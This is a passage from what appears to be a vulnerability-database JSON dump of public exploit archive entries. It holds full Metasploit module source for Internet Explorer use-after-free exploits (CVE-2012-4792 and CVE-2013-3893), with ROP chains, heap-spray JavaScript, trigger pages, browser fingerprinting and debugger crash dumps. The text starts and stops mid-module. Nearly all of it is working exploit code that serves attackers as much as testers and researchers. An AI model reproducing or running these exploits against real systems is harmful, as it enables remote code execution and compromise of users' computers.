INC EBX # RETN [hxds.dll]\r\n 0x51bfa98e, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51c55c45, # DEC EAX, RETN [hxds.dll]\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c4c17c, # POP ECX # RETN [hxds.dll]\r\n 0xffffffc0,\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c05766, # POP EDI # RETN [hxds.dll] \r\n 0x51bfbaaf, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c2e77d, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc840, # JMP [EAX] [hxds.dll]\r\n 0x51c05266, # POP EAX # RETN [hxds.dll] \r\n 0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51bdf91f, # PUSHAD # RETN [hxds.dll] \r\n 0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n\r\n when :office2010\r\n rop = \r\n [\r\n # 4 dword junks due to the add esp in stack pivot\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51c41953, # POP EBP # RETN [hxds.dll]\r\n 0x51be3a03, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c41953, # skip 4 bytes [hxds.dll]\r\n 0x51c4486d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bfa298, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51bd5382, # DEC EAX # RETN [hxds.dll]\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1f094, # POP ECX # RETN [hxds.dll] \r\n 0xffffffc0,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf1ff0, # POP EDI # RETN [hxds.dll] \r\n 0x51bd5383, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c07c8b, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc7cb, # JMP [EAX] [hxds.dll]\r\n 0x51c44707, # POP EAX # RETN [hxds.dll] \r\n 0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51c3604e, # PUSHAD # RETN [hxds.dll] \r\n 0x51c541ef, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n end\r\n\r\n p = rop + code\r\n p\r\n end\r\n\r\n def get_exploit_html(cli, req, rop_dll)\r\n gadgets = {}\r\n case rop_dll\r\n when :office2007\r\n gadgets[:spray1] = 0x1af40020\r\n\r\n # 0x31610020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x3160ff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1ce8\r\n\r\n # xchg eax,esp\r\n # add byte [eax], al\r\n # pop esi\r\n # mov [edi+23c], ebp\r\n # mov [edi+238], ebp\r\n # mov [edi+234], ebp\r\n # pop ebp\r\n # pop ebx\r\n # ret\r\n gadgets[:pivot] = 0x51be4418\r\n\r\n when :office2010\r\n gadgets[:spray1] = 0x1a7f0020\r\n\r\n # 0x30200020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x301fff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1a41\r\n\r\n # xchg eax,esp\r\n # add eax,dword ptr [eax]\r\n # add esp,10\r\n # mov eax,esi\r\n # pop esi\r\n # pop ebp # retn 4\r\n gadgets[:pivot] = 0x51c00e64\r\n end\r\n\r\n p1 =\r\n [\r\n gadgets[:target], # Target address\r\n gadgets[:pivot] # stack pivot\r\n ].pack(\"V*\")\r\n\r\n p1 << get_payload(rop_dll)\r\n\r\n p2 =\r\n [\r\n gadgets[:call_eax] # MSHTML!CTreeNode::NodeAddRef+0x48 (call eax)\r\n ].pack(\"V*\")\r\n\r\n js_s1 = Rex::Text::to_unescape([gadgets[:spray1]].pack(\"V*\"))\r\n js_p1 = Rex::Text.to_unescape(p1)\r\n js_p2 = Rex::Text.to_unescape(p2)\r\n\r\n %Q|\r\n<html>\r\n<script>\r\n#{js_property_spray}\r\n\r\nfunction loadOffice() {\r\n try{location.href='ms-help://'} catch(e){}\r\n}\r\n\r\nvar a = new Array();\r\nfunction spray() {\r\n var obj = '';\r\n for (i=0; i<20; i++) {\r\n if (i==0) { obj += unescape(\"#{js_s1}\"); }\r\n else { obj += \"\\\\u4242\\\\u4242\"; }\r\n }\r\n obj += \"\\\\u5555\";\r\n\r\n for (i=0; i<10; i++) {\r\n var e = document.createElement(\"div\");\r\n e.className = obj;\r\n a.push(e);\r\n }\r\n\r\n var s1 = unescape(\"#{js_p1}\");\r\n sprayHeap({shellcode:s1, maxAllocs:0x300});\r\n var s2 = unescape(\"#{js_p2}\");\r\n sprayHeap({shellcode:s2, maxAllocs:0x300});\r\n}\r\n\r\nfunction hit()\r\n{\r\n var id_0 = document.createElement(\"sup\");\r\n var id_1 = document.createElement(\"audio\");\r\n\r\n document.body.appendChild(id_0);\r\n document.body.appendChild(id_1);\r\n id_1.applyElement(id_0);\r\n\r\n id_0.onlosecapture=function(e) {\r\n document.write(\"\");\r\n spray();\r\n }\r\n\r\n id_0['outerText']=\"\";\r\n id_0.setCapture();\r\n id_1.setCapture();\r\n}\r\n\r\nfor (i=0; i<20; i++) {\r\n document.createElement(\"frame\");\r\n}\r\n\r\nwindow.onload = function() {\r\n loadOffice();\r\n hit();\r\n}\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n unless is_win7_ie9?(agent)\r\n print_error(\"Not a suitable target: #{agent}\")\r\n send_not_found(cli)\r\n end\r\n\r\n html = ''\r\n if request.uri =~ /\\?dll=(\\w+)$/\r\n rop_dll = ''\r\n if $1 == 'office2007'\r\n print_status(\"Using Office 2007 ROP chain\")\r\n rop_dll = :office2007\r\n elsif $1 == 'office2010'\r\n print_status(\"Using Office 2010 ROP chain\")\r\n rop_dll = :office2010\r\n else\r\n print_error(\"Target does not have Office installed\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = get_exploit_html(cli, request, rop_dll)\r\n else\r\n print_status(\"Checking target requirements...\")\r\n html = get_preq_html(cli, request)\r\n end\r\n\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n end\r\n\r\n def exploit\r\n @exploit_page = \"default.html\"\r\n super\r\n end\r\n\r\nend\r\n\r\n=begin\r\n\r\nhxds.dll (Microsoft\u00ae Help Data Services Module)\r\n\r\n 2007 DLL info:\r\n ProductVersion: 2.05.50727.198\r\n FileVersion: 2.05.50727.198 (QFE.050727-1900)\r\n\r\n 2010 DLL info:\r\n ProductVersion: 2.05.50727.4039\r\n FileVersion: 2.05.50727.4039 (QFE.050727-4000)\r\n\r\nmshtml.dll\r\n ProductVersion: 9.00.8112.16446\r\n FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)\r\n FileDescription: Microsoft (R) HTML Viewer\r\n\r\n\r\n0:005> r\r\neax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34\r\neip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nMSHTML!CTreeNode::GetInterface+0xd8:\r\n679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????\r\n\r\n\r\n66e13df7 8b0e mov ecx,dword ptr [esi]\r\n66e13df9 8b11 mov edx,dword ptr [ecx] <-- mshtml + (63993df9 - 63580000)\r\n66e13dfb 8b82c4000000 mov eax,dword ptr [edx+0C4h]\r\n66e13e01 ffd0 call eax\r\n\r\n=end\n\n# 0day.today [2018-04-11] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21313"}, {"lastseen": "2018-01-10T17:26:01", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers.", "modified": "2012-12-31T00:00:00", "published": "2012-12-31T00:00:00", "id": "1337DAY-ID-20069", "href": "https://0day.today/exploit/description/20069", "type": "zdt", "title": "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\r\n use-after-free condition occurs when a CButton object is freed, but a reference\r\n is kept and used again during a page reload, an invalid memory that's controllable\r\n is used, and allows arbitrary code execution under the context of the user.\r\n\r\n Please note: This vulnerability has been exploited in the wild targeting\r\n mainly China/Taiwan/and US-based computers.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'eromang',\r\n 'mahmud ab rahman',\r\n 'juan vazquez',\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-4792' ],\r\n [ 'US-CERT-VU', '154201' ],\r\n [ 'BID', '57070' ],\r\n [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],\r\n [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],\r\n [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 980,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30\r\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Dec 27 2012\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n\r\n end\r\n\r\n def get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\r\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\r\n\r\n ie_name = \"IE #{ie}\"\r\n\r\n case nt\r\n when '5.1'\r\n os_name = 'Windows XP SP3'\r\n when '5.2'\r\n os_name = 'Windows Server 2003'\r\n when '6.0'\r\n os_name = 'Windows Vista'\r\n when '6.1'\r\n os_name = 'Windows 7'\r\n else\r\n # OS not supported\r\n return nil\r\n end\r\n\r\n targets.each do |t|\r\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\r\n print_status(\"Target selected as: #{t.name}\")\r\n return t\r\n end\r\n end\r\n\r\n return nil\r\n end\r\n\r\n def ie_heap_spray(my_target, p)\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\r\n js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch))\r\n\r\n # Land the payload at 0x0c0c0b30\r\n js = %Q|\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n while (nops.length < 0x80000) nops += nops;\r\n var offset = nops.substring(0, #{my_target['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n heap_obj.gc();\r\n for (var i=1; i < 0x300; i++) {\r\n heap_obj.alloc(block);\r\n }\r\n |\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n return js\r\n end\r\n\r\n def get_payload(t, cli)\r\n code = payload.encoded\r\n\r\n # No rop. Just return the payload.\r\n return code if t['Rop'].nil?\r\n\r\n=begin\r\nStack Pivoting to eax:\r\n0:008> db eax\r\n0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................\r\n=end\r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n if t.name =~ /Windows XP/\r\n stack_pivot = [0x77c15ed6].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x77c2362c].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x77c15ed5].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})\r\n else\r\n stack_pivot = [0x77bcba5f].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x77bb4158].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x77bcba5e].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})\r\n end\r\n else\r\n print_status(\"Using JRE ROP\")\r\n stack_pivot = [0x7c348b06].pack(\"V\") * 54 # ret\r\n stack_pivot << [0x7c341748].pack(\"V\") # pop ebx, #ret\r\n stack_pivot << [0x7c348b05].pack(\"V\") # xchg eax,esp # ret # 0x0c0c0c0c\r\n rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})\r\n end\r\n\r\n return rop_payload\r\n end\r\n\r\n def load_exploit_html(my_target, cli)\r\n\r\n p = get_payload(my_target, cli)\r\n js = ie_heap_spray(my_target, p)\r\n\r\n html = %Q|\r\n <!doctype html>\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n\r\n function exploit()\r\n {\r\n var e0 = null;\r\n var e1 = null;\r\n var e2 = null;\r\n var arrObject = new Array(3000);\r\n var elmObject = new Array(500);\r\n for (var i = 0; i < arrObject.length; i++)\r\n {\r\n arrObject[i] = document.createElement('div');\r\n arrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n }\r\n\r\n for (var i = 0; i < arrObject.length; i += 2)\r\n {\r\n arrObject[i].className = null;\r\n }\r\n\r\n CollectGarbage();\r\n\r\n for (var i = 0; i < elmObject.length; i ++)\r\n {\r\n elmObject[i] = document.createElement('button');\r\n }\r\n\r\n for (var i = 1; i < arrObject.length; i += 2)\r\n {\r\n arrObject[i].className = null;\r\n }\r\n\r\n CollectGarbage();\r\n\r\n try {\r\n e0 = document.getElementById(\"a\");\r\n e1 = document.getElementById(\"b\");\r\n e2 = document.createElement(\"q\");\r\n e1.applyElement(e2);\r\n e1.appendChild(document.createElement('button'));\r\n e1.applyElement(e0);\r\n e2.outerText = \"\";\r\n e2.appendChild(document.createElement('body'));\r\n } catch(e) { }\r\n CollectGarbage();\r\n for(var i =0; i < 20; i++)\r\n {\r\n arrObject[i].className = unescape(\"ababababababababababababababababababababa\");\r\n }\r\n var eip = window;\r\n var data = \"#{Rex::Text.rand_text_alpha(41)}\";\r\n eip.location = unescape(\"%u0b30%u0c0c\" + data);\r\n\r\n }\r\n\r\n </script>\r\n </head>\r\n <body onload=\"eval(exploit())\">\r\n <form id=\"a\">\r\n </form>\r\n <dfn id=\"b\">\r\n </dfn>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n uri = request.uri\r\n print_status(\"Requesting: #{uri}\")\r\n\r\n my_target = get_target(agent)\r\n # Avoid the attack if no suitable target found\r\n if my_target.nil?\r\n print_error(\"Browser not supported, sending 404: #{agent}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n html = load_exploit_html(my_target, cli)\r\n html = html.gsub(/^\\t\\t/, '')\r\n print_status(\"Sending HTML...\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n(87c.f40): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\r\n0:008> k\r\nChildEBP RetAddr\r\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\r\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\r\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\r\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\r\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\r\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\r\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\r\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\r\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\r\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\r\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\r\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\r\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\r\n020bffec 00000000 kernel32!BaseThreadStart+0x37\r\n\r\n0:008> r\r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\r\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\r\nmshtml!CMarkup::OnLoadStatusDone+0x504:\r\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\r\n\r\n=end\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20069"}], "exploitdb": [{"lastseen": "2016-02-03T08:41:42", "bulletinFamily": "exploit", "description": "Micorosft Internet Explorer SetMouseCapture Use-After-Free. CVE-2013-3893. Remote exploit for windows platform", "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "EDB-ID:28682", "href": "https://www.exploit-db.com/exploits/28682/", "type": "exploitdb", "title": "Micorosft Internet Explorer SetMouseCapture Use-After-Free", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Micorosft Internet Explorer SetMouseCapture Use-After-Free\",\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability that currents targets Internet\r\n Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11.\r\n It was initially found in the wild in Japan, but other regions such as English,\r\n Chinese, Korean, etc, were targeted as well.\r\n\r\n The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a\r\n reference during an event. An attacker first can setup two elements, where the second\r\n is the child of the first, and then setup a onlosecapture event handler for the parent\r\n element. The onlosecapture event seems to require two setCapture() calls to trigger,\r\n one for the parent element, one for the child. When the setCapture() call for the child\r\n element is called, it finally triggers the event, which allows the attacker to cause an\r\n arbitrary memory release using document.write(), which in particular frees up a 0x54-byte\r\n memory. The exact size of this memory may differ based on the version of IE. After the\r\n free, an invalid reference will still be kept and pass on to more functions, eventuall\r\n this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary\r\n code execution) when this function attempts to use this reference to call what appears to\r\n be a PrivateQueryInterface due to the offset (0x00).\r\n\r\n To mimic the same exploit found in the wild, this module will try to use the same DLL\r\n from Microsoft Office 2007 or 2010 to leverage the attack.\r\n\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild first spotted in Japan\r\n 'sinn3r' # Metasploit (thx binjo for the heads up!)\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3893' ],\r\n [ 'OSVDB', '97380' ],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2887505' ],\r\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'IE 9 on Windows 7 SP1 with Microsoft Office 2007 or 2010', {} ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'PrependEncoder' => \"\\x81\\xc4\\x80\\xc7\\xfe\\xff\" # add esp, -80000\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'PrependMigrate' => true,\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Sep 17 2013\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def is_win7_ie9?(agent)\r\n (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\\.1/)\r\n end\r\n\r\n def get_preq_html(cli, req)\r\n %Q|\r\n<html>\r\n<script>\r\n function getDLL() {\r\n var checka = 0;\r\n var checkb = 0;\r\n\r\n try {\r\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\r\n } catch (e) {}\r\n\r\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\r\n return \"office2010\";\r\n }\r\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\r\n return \"office2007\";\r\n }\r\n\r\n return \"na\";\r\n }\r\n\r\n window.onload = function() {\r\n document.location = \"#{get_resource}/#{@exploit_page}?dll=\" + getDLL();\r\n }\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def junk\r\n return rand_text_alpha(4).unpack(\"V\")[0].to_i\r\n end\r\n\r\n def get_payload(rop_dll)\r\n code = payload.encoded\r\n rop = ''\r\n p = ''\r\n\r\n case rop_dll\r\n when :office2007\r\n rop = \r\n [\r\n junk, # Alignment\r\n 0x51c46f91, # POP EBP # RETN [hxds.dll] \r\n 0x51c46f91, # skip 4 bytes [hxds.dll]\r\n 0x51c35a4d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51bd90fd, # INC EBX # RETN [hxds.dll]\r\n 0x51bd90fd, # INC EBX # RETN [hxds.dll]\r\n 0x51bfa98e, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51c55c45, # DEC EAX, RETN [hxds.dll]\r\n 0x51c08b65, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c4c17c, # POP ECX # RETN [hxds.dll]\r\n 0xffffffc0,\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c1df88, # NEG EAX # RETN [hxds.dll]\r\n 0x51bfbaae, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51c05766, # POP EDI # RETN [hxds.dll] \r\n 0x51bfbaaf, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c2e77d, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc840, # JMP [EAX] [hxds.dll]\r\n 0x51c05266, # POP EAX # RETN [hxds.dll] \r\n 0x51bd115c, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51bdf91f, # PUSHAD # RETN [hxds.dll] \r\n 0x51c4a9f3, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n\r\n when :office2010\r\n rop = \r\n [\r\n # 4 dword junks due to the add esp in stack pivot\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51c41953, # POP EBP # RETN [hxds.dll]\r\n 0x51be3a03, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c41953, # skip 4 bytes [hxds.dll]\r\n 0x51c4486d, # POP EBX # RETN [hxds.dll] \r\n 0xffffffff,\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51bd1a77, # INC EAX # RETN [hxds.dll]\r\n 0x51c392d8, # EXCHG EAX, EBX # RETN [hxds.dll]\r\n 0x51bfa298, # POP EDX # RETN [hxds.dll] \r\n 0xffffefff,\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51bd5382, # DEC EAX # RETN [hxds.dll]\r\n 0x51bea84d, # XCHG EAX, EDX # RETN [hxds.dll]\r\n 0x51c1f094, # POP ECX # RETN [hxds.dll] \r\n 0xffffffc0,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf5188, # NEG EAX # POP ESI # RETN [hxds.dll]\r\n junk,\r\n 0x51be5986, # XCHG EAX, ECX # RETN [hxds.dll]\r\n 0x51bf1ff0, # POP EDI # RETN [hxds.dll] \r\n 0x51bd5383, # RETN (ROP NOP) [hxds.dll]\r\n 0x51c07c8b, # POP ESI # RETN [hxds.dll] \r\n 0x51bfc7cb, # JMP [EAX] [hxds.dll]\r\n 0x51c44707, # POP EAX # RETN [hxds.dll] \r\n 0x51bd10bc, # ptr to &VirtualAlloc() [IAT hxds.dll]\r\n 0x51c3604e, # PUSHAD # RETN [hxds.dll] \r\n 0x51c541ef, # ptr to 'jmp esp' [hxds.dll]\r\n ].pack(\"V*\")\r\n end\r\n\r\n p = rop + code\r\n p\r\n end\r\n\r\n def get_exploit_html(cli, req, rop_dll)\r\n gadgets = {}\r\n case rop_dll\r\n when :office2007\r\n gadgets[:spray1] = 0x1af40020\r\n\r\n # 0x31610020-0xc4, pointer to gadgets[:call_eax]\r\n gadgets[:target] = 0x3160ff5c\r\n\r\n # mov eax, [esi]\r\n # push esi\r\n # call [eax+4]\r\n gadgets[:call_eax] = 0x51bd1ce8\r\n\r\n # xchg eax,esp\r\n # add byte [eax], al\r\n # pop 